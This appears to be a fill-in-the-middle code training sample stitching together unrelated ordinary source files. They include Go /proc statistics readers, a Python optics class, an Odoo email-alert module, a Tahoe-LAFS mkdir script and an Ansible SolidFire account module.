&entry.ReqTicks) if err != nil { return err } if num_items == 14 { entry.RdMerges = rdmerge_or_rdsec entry.RdSectors = rdsec_or_wrios entry.RdTicks = rdticks_or_wrsec } else if num_items == 7 { entry.RdSectors = rdmerge_or_rdsec entry.WrIos = rdsec_or_wrios entry.WrSectors = rdticks_or_wrsec } else { continue } if entry.RdIos == 0 && entry.WrIos == 0 { continue } if targets != nil { if _, ok := (*targets)[entry.Name]; !ok { // device not in targets continue } } else { if !isDevice(entry.Name) { continue } } record.Disk.Entries = append(record.Disk.Entries, entry) } return nil } func ReadNetStat(record *StatRecord) error { if record == nil { return errors.New("Valid *StatRecord is required.") } net_stat := NewNetStat() f, err := os.Open("/proc/net/dev") if err != nil { return err } defer f.Close() scanner := bufio.NewScanner(f) for scanner.Scan() { line := scanner.Text() switch { case line[0:7] == "Inter-|": continue case line[0:7] == " face |": continue } line = strings.Replace(line, ":", 
" ", -1) e := NewNetStatEntry() var devname string n, err := fmt.Sscanf(line, "%s %d %d %d %d %d %d %d %d %d %d %d %d %d %d %d %d", &devname, &e.RxBytes, &e.RxPackets, &e.RxErrors, &e.RxDrops, &e.RxFifo, &e.RxFrame, &e.RxCompressed, &e.RxMulticast, &e.TxBytes, &e.TxPackets, &e.TxErrors, &e.TxDrops, &e.TxFifo, &e.TxFrame, &e.TxCompressed, &e.TxMulticast) if err == io.EOF { break } else if err != nil { return err } if n != 17 { continue } // trim trailing ":" from devname if devname[len(devname)-1] == ':' { devname = devname[0 : len(devname)-1] } e.Name = devname net_stat.Entries = append(net_stat.Entries, e) } record.Net = net_stat return nil } func ReadMemStat(record *StatRecord) error { if record == nil { return errors.New("Valid *StatRecord is required.") } mem_stat := NewMemStat() f, err := os.Open("/proc/meminfo") if err != nil { return err } defer f.Close() scanner := bufio.NewScanner(f) for scanner.Scan() { var key string var val int64 line := scanner.Text() n, err := fmt.Sscanf(line, "%s %d", &key, &val) if err == io.EOF { break } else if err != nil { return err } if n != 2 { continue } switch key { case "HugePages_Surp:": mem_stat.HugePages_Surp = val case "HugePages_Rsvd:": mem_stat.HugePages_Rsvd = val case "HugePages_Free:": mem_stat.HugePages_Free = val case "HugePages_Total:": mem_stat.HugePages_Total = val case "Hugepagesize:": mem_stat.Hugepagesize = val case "AnonHugePages:": mem_stat.AnonHugePages = val case "Committed_AS:": mem_stat.Committed_AS = val case "CommitLimit:": mem_stat.CommitLimit = val case "Bounce:": mem_stat.Bounce = val case "NFS_Unstable:": mem_stat.NFS_Unstable = val case "Shmem:": mem_stat.Shmem = val case "Slab:": mem_stat.Slab = val case "SReclaimable:": mem_stat.SReclaimable = val case "SUnreclaim:": mem_stat.SUnreclaim = val case "KernelStack:": mem_stat.KernelStack = val case "PageTables:": mem_stat.PageTables = val case "Mapped:": mem_stat.Mapped = val case "AnonPages:": mem_stat.AnonPages = val case "Writeback:": mem_stat.Writeback = val case "Dirty:": mem_stat.Dirty = val case "SwapFree:": mem_stat.SwapFree = val case "SwapTotal:": mem_stat.SwapTotal = val case "Inactive:": mem_stat.Inactive = val case "Active:": mem_stat.Active = val case "SwapCached:": mem_stat.SwapCached = val case "Cached:": mem_stat.Cached = val case "Buffers:": mem_stat.Buffers = val case "MemFree:": mem_stat.MemFree = val case "MemTotal:": mem_stat.MemTotal = val } } record.Mem = mem_stat return nil }<|fim▁end|>
if err != nil {
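The Go record above reads Linux kernel counters by scanning /proc text files field by field (/proc/stat, /proc/interrupts, /proc/diskstats, /proc/net/dev, /proc/meminfo). For illustration, a minimal standalone Python sketch of the same approach applied to /proc/meminfo, in the spirit of the ReadMemStat loop; the function name and the returned dict are mine, not part of the record:

# Each /proc/meminfo line looks like "MemTotal:  16326544 kB"; split on
# whitespace and keep the integer value keyed by the field name.
def read_mem_stat(path="/proc/meminfo"):
    stats = {}
    with open(path) as f:
        for line in f:
            parts = line.split()
            if len(parts) < 2:
                continue
            try:
                stats[parts[0].rstrip(":")] = int(parts[1])
            except ValueError:
                continue
    return stats

# Usage (Linux only): read_mem_stat()["MemTotal"] -> total memory in kB.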
<|file_name|>special.py<|end_file_name|><|fim▁begin|>'''Defines the Special class for theia.''' # Provides: # class Special # __init__ # lines import numpy as np from ..helpers import geometry, settings from ..helpers.units import deg, cm, pi from .optic import Optic class Special(Optic): ''' Special class. This class represents general optics, as their actions on R and T are left to the user to input. They are useful for special optics which are neither reflective nor transmissive. Actions: * T on HR: user input * R on HR: user input * T on AR: user input * R on AR: user input **Note**: by default the actions of these objects are those of beamsplitters (0, 0, 0, 0) *=== Additional attributes with respect to the Optic class ===* <|fim▁hole|> *=== Name ===* Special **Note**: the curvature of any surface is positive for a concave surface (coating inside the sphere). Thus kurv*HRNorm/|kurv| always points to the center of the sphere of the surface, as is the convention for the lineSurfInter of geometry module. Same for AR. ******* HRK > 0 and ARK > 0 ******* HRK > 0 and ARK < 0 ***** ******** and |ARK| > |HRK| H***A H*********A ***** ******** ******* ******* ''' Name = "Special" def __init__(self, Wedge = 0., Alpha = 0., X = 0., Y = 0., Z = 0., Theta = pi/2., Phi = 0., Diameter = 10.e-2, HRr = .99, HRt = .01, ARr = .1, ARt = .9, HRK = 0.01, ARK = 0, Thickness = 2.e-2, N = 1.4585, KeepI = False, RonHR = 0, TonHR = 0, RonAR = 0, TonAR = 0, Ref = None): '''Special optic initializer. Parameters are the attributes. Returns a special optic. ''' # actions TonHR = int(TonHR) RonHR = int(RonHR) TonAR = int(TonAR) RonAR = int(RonAR) # Initialize input data N = float(N) Wedge = float(Wedge) Alpha = float(Alpha) Theta = float(Theta) Phi = float(Phi) Diameter = float(Diameter) Thickness = float(Thickness) HRK = float(HRK) ARK = float(ARK) HRt = float(HRt) HRr = float(HRr) ARt = float(ARt) ARr = float(ARr) #prepare for mother initializer HRNorm = np.array([np.sin(Theta)*np.cos(Phi), np.sin(Theta) * np.sin(Phi), np.cos(Theta)], dtype = np.float64) HRCenter = np.array([X, Y, Z], dtype = np.float64) #Calculate ARCenter and ARNorm with wedge and alpha and thickness: ARCenter = HRCenter\ - (Thickness + .5 * np.tan(Wedge) * Diameter) * HRNorm a,b = geometry.basis(HRNorm) ARNorm = -np.cos(Wedge) * HRNorm\ + np.sin(Wedge) * (np.cos(Alpha) * a\ + np.sin(Alpha) * b) super(Special, self).__init__(ARCenter = ARCenter, ARNorm = ARNorm, N = N, HRK = HRK, ARK = ARK, ARr = ARr, ARt = ARt, HRr = HRr, HRt = HRt, KeepI = KeepI, HRCenter = HRCenter, HRNorm = HRNorm, Thickness = Thickness, Diameter = Diameter, Wedge = Wedge, Alpha = Alpha, TonHR = TonHR, RonHR = RonHR, TonAR = TonAR, RonAR = RonAR, Ref = Ref) #Warnings for console output if settings.warning: self.geoCheck("mirror") def lines(self): '''Returns the list of lines necessary to print the object.''' sph = geometry.rectToSph(self.HRNorm) return ["Special: %s {" % str(self.Ref), "TonHR, RonHR: %s, %s" % (str(self.TonHR), str(self.RonHR)), "TonAR, RonAR: %s, %s" % (str(self.TonAR), str(self.RonAR)), "Thick: %scm" % str(self.Thick/cm), "Diameter: %scm" % str(self.Dia/cm), "Wedge: %sdeg" % str(self.Wedge/deg), "Alpha: %sdeg" % str(self.Alpha/deg), "HRCenter: %s" % str(self.HRCenter), "HRNorm: (%s, %s)deg" % (str(sph[0]/deg), str(sph[1]/deg)), "Index: %s" %str(self.N), "HRKurv, ARKurv: %s, %s" % (str(self.HRK), str(self.ARK)), "HRr, HRt, ARr, ARt: %s, %s, %s, %s" \ % (str(self.HRr), str(self.HRt), str(self.ARr), str(self.ARt)), "}"]<|fim▁end|>
None
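The __init__ in the record above derives the AR-face normal by tilting the HR normal through the wedge angle, in a direction set by alpha inside the plane orthogonal to the HR normal. A small numpy sketch of that same vector construction; the hand-rolled basis() here is an assumed stand-in for theia's geometry.basis, not the library's actual code:

import numpy as np

def basis(n):
    # Two unit vectors spanning the plane orthogonal to n (assumed helper).
    a = np.cross(n, [0.0, 0.0, 1.0])
    if np.linalg.norm(a) < 1e-9:          # n parallel to z: pick another axis
        a = np.cross(n, [0.0, 1.0, 0.0])
    a /= np.linalg.norm(a)
    return a, np.cross(n, a)

def ar_normal(hr_norm, wedge, alpha):
    # ARNorm = -cos(W)*HRNorm + sin(W)*(cos(alpha)*a + sin(alpha)*b)
    hr_norm = np.asarray(hr_norm, dtype=float)
    a, b = basis(hr_norm)
    return (-np.cos(wedge) * hr_norm
            + np.sin(wedge) * (np.cos(alpha) * a + np.sin(alpha) * b))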
<|file_name|>board_alerts.py<|end_file_name|><|fim▁begin|>############################################################################### # # OpenERP, Open Source Management Solution # Copyright (C) 2013, 2015 XCG Consulting (http://www.xcg-consulting.fr/) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################### from ast import literal_eval import datetime from lxml import etree from openerp import exceptions from openerp import SUPERUSER_ID from openerp.osv import orm from openerp.tools import DEFAULT_SERVER_DATE_FORMAT from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT from openerp.tools.translate import _ class board_alerts(orm.Model): """Inherit from res.users to allow sending email alerts.""" _inherit = 'res.users' def send_board_alerts(self, cr, uid, context=None): """Find users and send them their board alerts. """ data_obj = self.pool['ir.model.data'] email_template_obj = self.pool['email.template'] # Get our email template, referenced by its XML ID. email_template_id = data_obj.get_object( cr, SUPERUSER_ID, 'board_alerts', 'board_alerts_email_template', context=context ).id # Loop through all users; send them an email. for user_id in self.search(cr, SUPERUSER_ID, [], context=context): # Don't send an email when there is no content. contents = self.get_board_alert_contents( cr, uid, [user_id], context ) if not contents: continue # Fill the context to avoid computing contents twice. email_context = context.copy() if context else {} email_context['board_alert_contents'] = contents email_template_obj.send_mail( cr, SUPERUSER_ID, email_template_id, user_id, context=email_context ) def get_board_alert_contents(self, cr, uid, ids, context=None):<|fim▁hole|> """Get the HTML content to be put inside a board alert email. A board is stored as a custom view; read it, find the actions it points to, get the models and views referenced by these actions and fetch the data. @rtype: String if there is content, else None. """ if not isinstance(ids, list): ids = [ids] if len(ids) != 1: raise exceptions.Warning( 'board_alerts: Only 1 ID expected in the ' '"get_board_alert_contents" function.' ) uid = ids[0] if not context: context = {} prev_contents = context.get('board_alert_contents') if prev_contents: return prev_contents context = self._default_context(cr, uid, context) # Only users in the base "employee" group can see boards, so only they # can receive board alerts. if not self.user_has_groups( cr, uid, 'base.group_user', context=context ): return act_window_obj = self.pool['ir.actions.act_window'] board_obj = self.pool['board.board'] data_obj = self.pool['ir.model.data'] param_obj = self.pool['ir.config_parameter'] view_obj = self.pool['ir.ui.view'] # Boards are stored as views; get the one referenced by the XML ID. 
board_view = data_obj.get_object( cr, uid, 'board_alerts', 'alert_board', context=context ) # Set up the link that will be inserted in emails. board_link = param_obj.get_param( cr, uid, 'web.base.url', context=context ) if board_link: board_link += '/?db=%s#action=%s' % ( cr.dbname, str(data_obj.get_object( cr, uid, 'board_alerts', 'action_alert_board', context=context ).id) ) # Get the "custom view" representing the board. board = board_obj.fields_view_get( cr, uid, view_id=board_view.id, context=context ) to_send = [] # Loop through "action" tags stored inside this custom view. tree = etree.fromstring(board['arch']) for action in tree.xpath('//action'): if action.attrib['view_mode'] != 'list': # Only care about lists for now. continue view_type = 'tree' # Interpret the attributes of the current "action" tag. act_id = int(action.attrib['name']) act_domain = literal_eval(action.attrib['domain']) act_context = literal_eval(action.attrib['context']) act_title = action.attrib['string'] # Get the action object pointed to by this "action" tag. act_window = act_window_obj.browse( cr, uid, act_id, context=context ) # Get the model referenced by this "action" tag. act_model = self.pool.get(act_window.res_model) # Find the view referenced by this "action" tag; we take the first # view that matches, which is correct as they are ordered by # priority. act_view_id = view_obj.search( cr, uid, [ ('model', '=', act_window.res_model), ('type', '=', view_type), ], limit=1, context=act_context, )[0] act_view = act_model.fields_view_get( cr, uid, view_id=act_view_id, view_type=view_type, context=act_context ) # Get the fields required by the view. Use this method so that the # result is similar to what the user sees in her board. act_tree = etree.fromstring(act_view['arch']) fields = [ field.attrib['name'] for field in act_tree.xpath('//field') if not field.attrib.get('invisible') ] fields_info = act_model.fields_get( cr, uid, fields, context=context ) # Get data IDs, according to the domain & context defined in the # action. content_ids = act_model.search( cr, uid, act_domain, context=act_context ) # Add field names at the top of the list. contents = [[fields_info[field]['string'] for field in fields]] # Fetch the data content_data_list = act_model.browse( cr, uid, content_ids, context=act_context ) or [] contents += [ [ self._format_content( getattr(content_data, field), fields_info[field], context ) for field in fields ] for content_data in content_data_list ] # Do not send empty content if not contents: # XXX Maybe change to a message. # XXX Probably add an option to send the message or not continue to_send.append((act_title, contents)) if not to_send: return return self._data_list_to_email_html(to_send, board_link, context) def _data_list_to_email_html(self, data_list, board_link, context): """Convert a data list to HTML code suitable for an email. @rtype: String. """ # The "context" parameter is required for translations to work. 
root = etree.Element('div') if board_link: link = etree.SubElement(etree.SubElement(root, 'h2'), 'a') link.attrib['href'] = board_link link.text = _('My Alerts') for data_title, data in data_list: frame = etree.SubElement(root, 'div') frame.attrib['style'] = ( 'border: 1px solid LightGray;' 'margin-top: 8px;' 'padding: 8px;' ) title = etree.SubElement(frame, 'h3') title.text = data_title or u'' table = etree.SubElement(frame, 'table') table.attrib['style'] = ( 'border-collapse: collapse;' 'border-spacing: 2px;' ) first_record = True for record in data: row = etree.SubElement(table, 'tr') if first_record: first_record = False row.attrib['style'] = ( 'background-color: LightGray;' 'font-weight: bolder;' ) for field in record: cell = etree.SubElement(row, 'td') cell.attrib['style'] = 'padding: 3px 6px;' cell.text = field return etree.tostring(root, pretty_print=True) def _default_context(self, cr, uid, context): """Get an Odoo context, adapted to the specified user. Contains additional values the "_format_content" function expects. """ ret = context.copy() lang_obj = self.pool['res.lang'] user = self.browse(cr, SUPERUSER_ID, [uid], context=context)[0] # The user object only has a "lang" selection key; find the actual # language object. lang_ids = lang_obj.search( cr, SUPERUSER_ID, [('code', '=', user.lang)], limit=1, context=context ) if not lang_ids: raise exceptions.Warning(_('Lang %s not found') % user.lang) lang = lang_obj.browse(cr, SUPERUSER_ID, lang_ids, context=context)[0] ret.update({ 'date_format': lang.date_format, 'datetime_format': '%s %s' % (lang.date_format, lang.time_format), 'lang': user.lang, 'tz': user.tz, 'uid': uid, }) return ret def _format_content(self, content, field_info, context): """Stringify the specified field value, taking care of translations and fetching related names. @type content: Odoo browse-record object. @param field_info: Odoo field information. @param context: Odoo context; must define the following: * date_format. * datetime_format. @rtype: String. """ # Delegate to per-type functions. return getattr( self, '_format_content_%s' % field_info['type'], lambda content, *args: str(content) )( content, field_info, context ) def _format_content_boolean(self, content, field_info, context): return _('Yes') if content else _('No') def _format_content_char(self, content, field_info, context): return content or '' def _format_content_date(self, content, field_info, context): if not content: return '' return ( datetime.datetime.strptime(content, DEFAULT_SERVER_DATE_FORMAT) .strftime(context['date_format']) ) def _format_content_datetime(self, content, field_info, context): if not content: return '' return ( datetime.datetime.strptime(content, DEFAULT_SERVER_DATETIME_FORMAT) .strftime(context['datetime_format']) ) def _format_content_float(self, content, field_info, context): # TODO Better float formatting (see report_sxw:digits_fmt, # report_sxw:get_digits for details. return str(content or 0.0) def _format_content_integer(self, content, field_info, context): return str(content or 0) def _format_content_many2many(self, content, field_info, context): if not content: return '' # TODO Simplify the following when a method can be executed on a # "browse_record_list" object (see the TODO near its declaration). 
return ', '.join( self._get_object_name(linked_content, context) for linked_content in content ) def _format_content_one2many(self, content, field_info, context): if not content: return '' # TODO Simplify the following when a method can be executed on a # "browse_record_list" object (see the TODO near its declaration). return ', '.join( self._get_object_name(linked_content, context) for linked_content in content ) def _format_content_selection(self, content, field_info, context): if not content: return '' return dict(field_info['selection']).get(content, '') def _format_content_many2one(self, content, field_info, context): if not content: return '' return self._get_object_name(content, context) def _format_content_text(self, content, field_info, context): return content or '' def _get_object_name(self, content, context): """Call the "name_get" function of the specified Odoo browse-record object. The "context" parameter is here to ensure proper translations. """ # 0: first element of the returned list. # 1: second element of the (ID, name) tuple. return content.name_get()[0][1]<|fim▁end|>
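_data_list_to_email_html in the record above builds the alert email as an lxml element tree instead of concatenating strings, styling the first row of each table as a header. A stripped-down sketch of that pattern; the function name and sample data are illustrative:

from lxml import etree

def rows_to_html(title, rows):
    root = etree.Element("div")
    etree.SubElement(root, "h3").text = title
    table = etree.SubElement(root, "table")
    for i, row in enumerate(rows):
        tr = etree.SubElement(table, "tr")
        if i == 0:                         # first record is the header row
            tr.attrib["style"] = "font-weight: bolder;"
        for value in row:
            etree.SubElement(tr, "td").text = value
    return etree.tostring(root, pretty_print=True)

# Usage: rows_to_html("My Alerts", [["Name", "Date"], ["foo", "2015-01-01"]])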
<|file_name|>NativeModule.ts<|end_file_name|><|fim▁begin|>/// <reference path="emscripten.d.ts" /> /// <reference path="libvorbis.asmjs.d.ts" /> /// <reference path="../typings/es6-promise/es6-promise.d.ts" /> module libvorbis { export function makeRawNativeModule(options?: emscripten.EmscriptenModuleOptions) { return new Promise<emscripten.EmscriptenModule>((resolve, reject) => {<|fim▁hole|><|fim▁end|>
_makeRawNativeModule(options, resolve); }); } }
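The TypeScript record above adapts a callback-style module factory into a Promise. The analogous adapter shape in Python, using a Future in place of the Promise; make_raw stands in for a callback API like _makeRawNativeModule and is hypothetical:

from concurrent.futures import Future

def make_module(make_raw, options=None):
    # The factory calls back when the module is ready; the caller waits
    # on the returned Future instead of passing a callback around.
    fut = Future()
    make_raw(options, fut.set_result)
    return fut

# Usage: make_module(make_raw).result() blocks until the callback fires.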
<|file_name|>NoteTwoTone.js<|end_file_name|><|fim▁begin|>"use strict"; var _interopRequireDefault = require("@babel/runtime/helpers/interopRequireDefault"); Object.defineProperty(exports, "__esModule", { value: true }); exports.default = void 0; var _createSvgIcon = _interopRequireDefault(require("./utils/createSvgIcon")); var _jsxRuntime = require("react/jsx-runtime"); var _default = (0, _createSvgIcon.default)([/*#__PURE__*/(0, _jsxRuntime.jsx)("path", {<|fim▁hole|> opacity: ".3" }, "0"), /*#__PURE__*/(0, _jsxRuntime.jsx)("path", { d: "M4 4c-1.1 0-2 .9-2 2v12.01c0 1.1.9 1.99 2 1.99h16c1.1 0 2-.9 2-2v-8l-6-6H4zm16 14.01H4V6h11v5h5v7.01z" }, "1")], 'NoteTwoTone'); exports.default = _default;<|fim▁end|>
d: "M15 6H4v12.01h16V11h-5z",
<|file_name|>ListEdgePoliciesInput.java<|end_file_name|><|fim▁begin|>/** * Copyright (c) Microsoft Corporation. All rights reserved. * Licensed under the MIT License. See License.txt in the project root for * license information. * * Code generated by Microsoft (R) AutoRest Code Generator. */ package com.microsoft.azure.management.mediaservices.v2018_07_01; import com.fasterxml.jackson.annotation.JsonProperty; /** * The ListEdgePoliciesInput model. */ public class ListEdgePoliciesInput {<|fim▁hole|> * Unique identifier of the edge device. */ @JsonProperty(value = "deviceId") private String deviceId; /** * Get unique identifier of the edge device. * * @return the deviceId value */ public String deviceId() { return this.deviceId; } /** * Set unique identifier of the edge device. * * @param deviceId the deviceId value to set * @return the ListEdgePoliciesInput object itself. */ public ListEdgePoliciesInput withDeviceId(String deviceId) { this.deviceId = deviceId; return this; } }<|fim▁end|>
/**
<|file_name|>tahoe_mkdir.py<|end_file_name|><|fim▁begin|>import urllib from allmydata.scripts.common_http import do_http, check_http_error from allmydata.scripts.common import get_alias, DEFAULT_ALIAS, UnknownAliasError from allmydata.util.encodingutil import quote_output def mkdir(options): nodeurl = options['node-url'] aliases = options.aliases where = options.where stdout = options.stdout stderr = options.stderr if not nodeurl.endswith("/"): nodeurl += "/" if where: try: rootcap, path = get_alias(aliases, where, DEFAULT_ALIAS) except UnknownAliasError, e: e.display(stderr)<|fim▁hole|> # create a new unlinked directory url = nodeurl + "uri?t=mkdir" if options["format"]: url += "&format=%s" % urllib.quote(options['format']) resp = do_http("POST", url) rc = check_http_error(resp, stderr) if rc: return rc new_uri = resp.read().strip() # emit its write-cap print >>stdout, quote_output(new_uri, quotemarks=False) return 0 # create a new directory at the given location if path.endswith("/"): path = path[:-1] # path must be "/".join([s.encode("utf-8") for s in segments]) url = nodeurl + "uri/%s/%s?t=mkdir" % (urllib.quote(rootcap), urllib.quote(path)) if options['format']: url += "&format=%s" % urllib.quote(options['format']) resp = do_http("POST", url) check_http_error(resp, stderr) new_uri = resp.read().strip() print >>stdout, quote_output(new_uri, quotemarks=False) return 0<|fim▁end|>
return 1 if not where or not path:
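tahoe_mkdir above drives the Tahoe-LAFS node's HTTP API: POST to uri?t=mkdir for an unlinked directory (the response body is the new write-cap), or to uri/<rootcap>/<path>?t=mkdir to create it at a location. A bare sketch of the first call; the record itself targets Python 2, this sketch uses Python 3, and the node URL is a placeholder:

from urllib.request import urlopen

def mkdir_unlinked(nodeurl="http://127.0.0.1:3456/"):
    # An empty POST body is enough; all parameters ride in the query string.
    with urlopen(nodeurl + "uri?t=mkdir", data=b"") as resp:
        return resp.read().strip()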
<|file_name|>obli.js<|end_file_name|><|fim▁begin|>module.exports = {<|fim▁hole|> }, trade: function(player, npc){ vendor("Obli's General Store"); } }<|fim▁end|>
talkTo: function(player, npc){ // TODO: Dialogues this.trade(player, npc);
<|file_name|>TableComplexityCheckTest.java<|end_file_name|><|fim▁begin|>/* * SonarQube Lua Plugin * Copyright (C) 2016 * mailto:fati.ahmadi AT gmail DOT com * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 3 of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public License * along with this program; if not, write to the Free Software Foundation, * Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package org.sonar.lua.checks; import org.junit.Test; import org.sonar.lua.LuaAstScanner; import org.sonar.squidbridge.api.SourceFile; import org.sonar.squidbridge.checks.CheckMessagesVerifier; import org.sonar.squidbridge.api.SourceFunction; import java.io.File; public class TableComplexityCheckTest { @Test public void test() { TableComplexityCheck check = new TableComplexityCheck(); check.setMaximumTableComplexityThreshold(0); SourceFile file = LuaAstScanner.scanSingleFile(new File("src/test/resources/checks/tableComplexity.lua"), check);<|fim▁hole|> .next().atLine(1).withMessage("Table has a complexity of 1 which is greater than 0 authorized.") .noMore(); } }<|fim▁end|>
CheckMessagesVerifier.verify(file.getCheckMessages())
<|file_name|>pixel_data_range.py<|end_file_name|><|fim▁begin|>'''OpenGL extension NV.pixel_data_range This module customises the behaviour of the OpenGL.raw.GL.NV.pixel_data_range to provide a more Python-friendly API Overview (from the spec) The vertex array range extension is intended to improve the efficiency of OpenGL vertex arrays. OpenGL vertex arrays' coherency model and ability to access memory from arbitrary locations in memory prevented implementations from using DMA (Direct Memory Access) operations. Many image-intensive applications, such as those that use dynamically generated textures, face similar problems. These applications would like to be able to sustain throughputs of hundreds of millions of pixels per second through DrawPixels and hundreds of millions of texels per second through TexSubImage. However, the same restrictions that limited vertex throughput also limit pixel throughput. By the time that any pixel operation that reads data from user memory returns, OpenGL requires that it must be safe for the application to start using that memory for a different purpose. This coherency model prevents asynchronous DMA transfers directly out of the user's<|fim▁hole|> There are also no restrictions on the pointer provided to pixel operations or on the size of the data. To facilitate DMA implementations, the driver needs to know in advance what region of the address space to lock down. Vertex arrays faced both of these restrictions already, but pixel operations have one additional complicating factor -- they are bidirectional. Vertex array data is always being transfered from the application to the driver and the HW, whereas pixel operations sometimes transfer data to the application from the driver and HW. Note that the types of memory that are suitable for DMA for reading and writing purposes are often different. For example, on many PC platforms, DMA pulling is best accomplished with write-combined (uncached) AGP memory, while pushing data should use cached memory so that the application can read the data efficiently once it has been read back over the AGP bus. This extension defines an API where an application can specify two pixel data ranges, which are analogous to vertex array ranges, except that one is for operations where the application is reading data (e.g. glReadPixels) and one is for operations where the application is writing data (e.g. glDrawPixels, glTexSubImage2D, etc.). Each pixel data range has a pointer to its start and a length in bytes. When the pixel data range is enabled, and if the pointer specified as the argument to a pixel operation is inside the corresponding pixel data range, the implementation may choose to asynchronously pull data from the pixel data range or push data to the pixel data range. Data pulled from outside the pixel data range is undefined, while pushing data to outside the pixel data range produces undefined results. The application may synchronize with the hardware in one of two ways: by flushing the pixel data range (or causing an implicit flush) or by using the NV_fence extension to insert fences in the command stream. The official definition of this extension is available here: http://www.opengl.org/registry/specs/NV/pixel_data_range.txt ''' from OpenGL import platform, constants, constant, arrays from OpenGL import extensions, wrapper from OpenGL.GL import glget import ctypes from OpenGL.raw.GL.NV.pixel_data_range import * ### END AUTOGENERATED SECTION<|fim▁end|>
buffer.
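The overview in the record above describes the NV_pixel_data_range protocol: declare a read range and a write range, keep the pointers handed to pixel operations inside them, and synchronize with a flush (or an NV_fence fence) before reusing the memory. A hedged usage sketch; the entry-point and enum names follow the NV spec wrapped by this module, but the exact Python call pattern is an assumption:

# Assumed PyOpenGL-style names per the NV_pixel_data_range spec.
from OpenGL.GL.NV.pixel_data_range import (
    glPixelDataRangeNV, glFlushPixelDataRangeNV, GL_WRITE_PIXEL_DATA_RANGE_NV)

def with_write_range(buf, draw):
    # Declare buf as the write pixel data range, issue draws whose source
    # pointers lie inside it, then flush before touching buf again.
    glPixelDataRangeNV(GL_WRITE_PIXEL_DATA_RANGE_NV, len(buf), buf)
    draw(buf)                     # e.g. glDrawPixels reading from buf
    glFlushPixelDataRangeNV(GL_WRITE_PIXEL_DATA_RANGE_NV)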
<|file_name|>sf_account_manager.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python # (c) 2017, NetApp, Inc # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' module: sf_account_manager short_description: Manage SolidFire accounts extends_documentation_fragment: - netapp.solidfire version_added: '2.3' author: Sumit Kumar ([email protected]) description: - Create, destroy, or update accounts on SolidFire options: state: description: - Whether the specified account should exist or not. required: true choices: ['present', 'absent'] name: description: - Unique username for this account. (May be 1 to 64 characters in length). required: true new_name: description: - New name for the user account. required: false default: None initiator_secret: description: - CHAP secret to use for the initiator. Should be 12-16 characters long and impenetrable. - The CHAP initiator secrets must be unique and cannot be the same as the target CHAP secret. - If not specified, a random secret is created. required: false target_secret: description: - CHAP secret to use for the target (mutual CHAP authentication). - Should be 12-16 characters long and impenetrable. - The CHAP target secrets must be unique and cannot be the same as the initiator CHAP secret. - If not specified, a random secret is created. required: false attributes: description: List of Name/Value pairs in JSON object format. required: false account_id: description: - The ID of the account to manage or update. required: false default: None status: description: - Status of the account. 
required: false ''' EXAMPLES = """ - name: Create Account<|fim▁hole|> hostname: "{{ solidfire_hostname }}" username: "{{ solidfire_username }}" password: "{{ solidfire_password }}" state: present name: TenantA - name: Modify Account sf_account_manager: hostname: "{{ solidfire_hostname }}" username: "{{ solidfire_username }}" password: "{{ solidfire_password }}" state: present name: TenantA new_name: TenantA-Renamed - name: Delete Account sf_account_manager: hostname: "{{ solidfire_hostname }}" username: "{{ solidfire_username }}" password: "{{ solidfire_password }}" state: absent name: TenantA-Renamed """ RETURN = """ """ import traceback from ansible.module_utils.basic import AnsibleModule from ansible.module_utils._text import to_native import ansible.module_utils.netapp as netapp_utils HAS_SF_SDK = netapp_utils.has_sf_sdk() class SolidFireAccount(object): def __init__(self): self.argument_spec = netapp_utils.ontap_sf_host_argument_spec() self.argument_spec.update(dict( state=dict(required=True, choices=['present', 'absent']), name=dict(required=True, type='str'), account_id=dict(required=False, type='int', default=None), new_name=dict(required=False, type='str', default=None), initiator_secret=dict(required=False, type='str'), target_secret=dict(required=False, type='str'), attributes=dict(required=False, type='dict'), status=dict(required=False, type='str'), )) self.module = AnsibleModule( argument_spec=self.argument_spec, supports_check_mode=True ) p = self.module.params # set up state variables self.state = p['state'] self.name = p['name'] self.account_id = p['account_id'] self.new_name = p['new_name'] self.initiator_secret = p['initiator_secret'] self.target_secret = p['target_secret'] self.attributes = p['attributes'] self.status = p['status'] if HAS_SF_SDK is False: self.module.fail_json(msg="Unable to import the SolidFire Python SDK") else: self.sfe = netapp_utils.create_sf_connection(module=self.module) def get_account(self): """ Return account object if found :return: Details about the account. None if not found. 
:rtype: dict """ account_list = self.sfe.list_accounts() for account in account_list.accounts: if account.username == self.name: # Update self.account_id: if self.account_id is not None: if account.account_id == self.account_id: return account else: self.account_id = account.account_id return account return None def create_account(self): try: self.sfe.add_account(username=self.name, initiator_secret=self.initiator_secret, target_secret=self.target_secret, attributes=self.attributes) except Exception as e: self.module.fail_json(msg='Error creating account %s: %s)' % (self.name, to_native(e)), exception=traceback.format_exc()) def delete_account(self): try: self.sfe.remove_account(account_id=self.account_id) except Exception as e: self.module.fail_json(msg='Error deleting account %s: %s' % (self.account_id, to_native(e)), exception=traceback.format_exc()) def update_account(self): try: self.sfe.modify_account(account_id=self.account_id, username=self.new_name, status=self.status, initiator_secret=self.initiator_secret, target_secret=self.target_secret, attributes=self.attributes) except Exception as e: self.module.fail_json(msg='Error updating account %s: %s' % (self.account_id, to_native(e)), exception=traceback.format_exc()) def apply(self): changed = False account_exists = False update_account = False account_detail = self.get_account() if account_detail: account_exists = True if self.state == 'absent': changed = True elif self.state == 'present': # Check if we need to update the account if account_detail.username is not None and self.new_name is not None and \ account_detail.username != self.new_name: update_account = True 